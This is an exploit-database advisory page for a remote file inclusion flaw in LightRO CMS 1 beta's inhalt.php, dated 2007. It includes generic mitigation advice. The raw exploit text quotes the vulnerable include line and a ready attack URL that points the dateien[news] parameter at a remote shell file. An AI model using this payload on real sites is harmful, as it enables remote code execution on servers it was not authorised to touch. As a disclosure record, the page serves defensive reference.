header-logo
Suggest Exploit
vendor:
LightRO CMS
by:
ajann
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: LightRO CMS
Affected Version From: 1 beta
Affected Version To: 1 beta
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

LightRO CMS 1 beta(inhalt.php) Remote File Include Vulnerability

The LightRO CMS 1 beta version is vulnerable to remote file inclusion. The vulnerability allows an attacker to include a remote file in the vulnerable script, leading to potential code execution or sensitive information disclosure.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patches and updates from the vendor. Additionally, input validation and sanitization should be implemented to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  LightRO CMS 1 beta(inhalt.php) Remote File Include Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.lightro.de.tc/
# $$      :  Free

*******************************************************************************
[[ERROR]]]
..
...
.....
<?
include $dateien['news'];
?>
..
...
.....

[[ERROR]]]


[[RFI]]]

http://[target]/[path]/inhalt.php?dateien[news]=[SHELL]

Example:

//inhalt.php?dateien[news]=http://[target]/[path]/shell.x

[[/RFI]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-02-06]

Navigation

Suggest Exploit

Services By CQR